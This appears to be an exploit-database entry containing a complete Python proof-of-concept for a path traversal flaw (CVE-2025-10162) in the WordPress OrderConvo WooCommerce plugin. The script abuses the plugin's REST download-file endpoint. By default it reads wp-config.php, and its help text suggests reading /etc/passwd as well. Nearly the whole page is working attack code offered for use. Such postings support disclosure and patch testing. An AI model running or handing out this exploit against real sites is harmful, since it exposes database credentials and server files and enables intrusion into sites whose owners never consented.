Share
## https://sploitus.com/exploit?id=PACKETSTORM:222473
# Exploit Title: WordPress OrderConvo 14 - Path Traversal
    # Date: 05-31-2026
    # Exploit Author: Diamorphine
    # Vendor Homepage: https://www.najeebmedia.com/ 
    # Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
    # Version: 13.5
    # Tested on: Debian
    # CVE : CVE-2025-10162
    
    import httpx
    import asyncio
    import argparse
    from urllib.parse import urljoin
    import sys
    
    
    async def main(base_url, file):
    	async with httpx.AsyncClient(verify=False) as client:
    		try:
    			print('[*] Checking connection to target')
    			req = await client.get(url=base_url)
    			if req.status_code == 200:
    				print('[+] The target is alive, exploiting\n')
    			else:
    				print(f'[-] Unable to connect to the target. Code: {req.status_code}')
    				sys.exit()
    		except:
    			print(f'[-] Problem with connection to the target.')
    			sys.exit()		
    	
    		exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
    		r = await client.get(url=exp_url)
    		if len(r.text) != 0:
    			print(r.text)
    		else:
    			print("[*] Unable to read file")
    
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")
    
    parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
    parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")
    
    args = parser.parse_args()
    
    if __name__ == '__main__':
    	asyncio.run(main(args.url, args.filename))